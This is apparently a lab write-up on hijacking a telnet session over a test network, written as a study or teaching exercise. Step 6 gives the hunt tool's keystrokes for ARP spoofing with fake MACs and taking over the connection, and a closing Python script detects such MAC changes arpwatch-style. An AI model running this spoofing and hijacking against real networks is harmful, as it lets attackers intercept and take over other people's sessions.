2020. 7. 15.

[Network] TCP Session Hijacking and arpwatch


    1. Setup and plan
    • Network diagram

    telnet server  att6 - 192.168.10.150/00:0C:29:16:97:9E
    att6 - 192.168.10.149/00:0C:29:C6:9A:42
    attack att5 - 192.168.10.148/00:0C:29:5D:87:05
    client winXP - 192.168.10.147/00:0c:29:26:42:b6

    • Procedure overview
    step1. att6: start arpwatch and sendmail
    step2. check that the client and the telnet server can communicate
    step3. install hunt on att5
    step4. att6: start tcpdump
    step5. client -> connect to the telnet server
    step6. run hunt on att
    step7. analyze the packets in wireshark

    2. Related notes
    hunt : a program for TCP session hijacking
    TCP session hijacking : an attack that takes over a session that is already established with a system

    3. Lab procedure

    step1. att6: start arpwatch and sendmail
    service arpwatch start
    service sendmail restart

    step2. check that the client and the telnet server can communicate
    ping 192.168.10.150

    step3. install hunt on att5
    yum install -y hunt

    step4. att6: start tcpdump
    tcpdump -i eth0 -xX -w sessionHijacking.cap

    step5. client -> connect to the telnet server
    telnet 192.168.10.150

    step6. run hunt on att (keystrokes below: d = daemons menu, a = arp spoof + arp relayer daemon, s = start relayer daemon)
    hunt
    d
    a
    s
    [Screenshot: hunt menus. Main menu entries "daemons rst/arp/sniff/mac", "options", "exit"; daemons menu: r) reset daemon, a) arp spoof + arp relayer daemon, s) sniff daemon, m) mac discovery daemon, x) return; arp spoof daemon menu: s/k) start/stop relayer daemon, l/L) list arp spoof database, a) add host to host arp spoof, d) delete host to host arp spoof, t) test if arp spoof successed, i/I) insert single/range arp spoof, r/R) remove single/range arp spoof, y) relay database, x) return. "-arps> s" answers "daemon started".]
    a
    192.168.10.147
    11:11:11:11:11:11
    192.168.10.150
    22:22:22:22:22:22
    1
    y
    [Screenshot: "-arps> a" (add host to host arp spoof) prompts for "src/dst host1 to arp spoof>", "host1 fake mac", "src/dst host2 to arp spoof>", "host2 fake mac" and "refresh interval sec". The first attempt reports "ARP spoof of 192.168.10.147 with fake mac 11:11:11:... in host 192.168.10.150 FAILED" and asks "do you want to force arp spoof until successed y/n" (CTRL-C to break).]
    [Screenshot: arp -a on the attacker host. The table on eth0 lists, among other hosts, 192.168.10.148 at 00:0c:29:5d:87:05 and 192.168.10.149 at 00:0c:29:c6:9a:42.]
    [Screenshot: arp -a on the winXP client (Interface: 192.168.10.147). Entries: 192.168.10.148 00-0c-29-5d-87-05 dynamic, 192.168.10.149 00-0c-29-c6-9a-42 dynamic, 192.168.10.150 22-22-22-22-22-22 dynamic. The telnet server's entry now carries the fake MAC given to hunt.]
    x
    x
    l
    [Screenshot: after leaving the daemon menus (x, x) hunt shows its main menu: l/w/r) list/watch/reset connections, u) host up tests, a) arp/simple hijack (avoids ack storm), s) simple hijack, d) daemons rst/arp/sniff/mac, o) options, x) exit. "l" lists the tracked connections: 192.168.10.147 (source ports between 1058 and 1266) --> 192.168.10.150 [23].]
    a
    0
    r
    y
    s
    [Screenshot: "a" (arp/simple hijack) asks "choose conn>", lists the 192.168.10.147 --> 192.168.10.150 [23] connections and notes "hosts already ARP spoofed"; then "input mode [r)aw, l)ine+echo+\r, ...]", "dump connection y/n" and "dump [s]rc/[d]st/[b]oth".]

    step7. analyze the packets in wireshark
    wireshark on
    • filter : ip.addr == 192.168.10.150
    [Screenshot: wireshark packet list for the filter ip.addr == 192.168.10.150. TELNET and TCP packets alternate between 192.168.10.147 and 192.168.10.150 on port 23 (Telnet Data ..., 23 [ACK] Seq=83 Ack=565 Win=64971 Len=0, 23 [ACK] Seq=83 Ack=888 Win=64648 Len=0).]
    Telnet login packets
    • filter : arp
    [Screenshot: wireshark packet list for the filter arp. 60-byte ARP frames: "Who has 192.168.10.151? Tell 192.168.10.147", "Who has 192.168.10.148? Tell 192.168.10.150", and replies "192.168.10.147 is at ..." / "192.168.10.150 is at ...".]
    Packets that perform the ARP spoofing

    4. Conclusion
    Nowadays TCP hijacking of telnet is hard. The moment you attempt it, the connection is torn down.
    MAC addresses must always be monitored so that a hacker cannot change them at will.
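The monitoring the conclusion calls for is what arpwatch does: it remembers each IP-to-MAC binding it sees in ARP traffic and reports when a binding changes. The Python below is an added example, not code from the original post or from arpwatch; it parses raw ARP frames, flags "changed ethernet address" events, and is run over three constructed frames that mirror the replies seen under the arp filter above (the bindings are the lab hosts from the diagram, the frames are built inline rather than captured).

```python
import struct
# Constructed bindings taken from the lab diagram above: telnet server .150 and winXP client .147
KNOWN = {"192.168.10.150": "00:0c:29:16:97:9e", "192.168.10.147": "00:0c:29:26:42:b6"}

def build_arp(op, sha, spa, tha, tpa):
    """Build an Ethernet II + ARP frame (op 1 = request, 2 = reply); used here only to make sample input."""
    mac = lambda s: bytes.fromhex(s.replace(":", ""))
    ip = lambda s: bytes(int(x) for x in s.split("."))
    eth = mac(tha) + mac(sha) + b"\x08\x06"
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op) + mac(sha) + ip(spa) + mac(tha) + ip(tpa)
    return eth + arp

def parse_arp(frame):
    """Return (op, sender_mac, sender_ip) for an Ethernet/IPv4 ARP frame, else None."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    sha = ":".join(f"{b:02x}" for b in frame[22:28])
    spa = ".".join(str(b) for b in frame[28:32])
    return op, sha, spa

def watch(frames, known):
    """arpwatch-style check: report each ARP sender whose MAC differs from the last binding seen."""
    table = dict(known)
    alerts = []
    for frame in frames:
        parsed = parse_arp(frame)
        if parsed is None:
            continue                       # not ARP (or truncated): ignore
        _op, mac, ip = parsed
        old = table.get(ip)
        if old is None:
            table[ip] = mac                # new station: learn it silently
        elif old != mac:
            alerts.append((ip, old, mac))  # "changed ethernet address" event
            table[ip] = mac                # track the flip so a flip-back is reported too
    return alerts

# Constructed traffic: one genuine reply from the server, then the two forged replies
# the hunt ARP relayer sends in step 6 (fake MACs 22:22:... and 11:11:...)
SAMPLE = [
    build_arp(2, "00:0c:29:16:97:9e", "192.168.10.150", "00:0c:29:26:42:b6", "192.168.10.147"),
    build_arp(2, "22:22:22:22:22:22", "192.168.10.150", "00:0c:29:26:42:b6", "192.168.10.147"),
    build_arp(2, "11:11:11:11:11:11", "192.168.10.147", "00:0c:29:16:97:9e", "192.168.10.150"),
]
if __name__ == "__main__":
    for ip, old, new in watch(SAMPLE, KNOWN):
        print(f"changed ethernet address: {ip} {old} -> {new}")
```

Running it reports the server and the client each flipping to a fake MAC, the same two events arpwatch on att6 would mail out; fed with an empty table instead of KNOWN, only the second frame is reported because the first binding of every station is learned silently.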


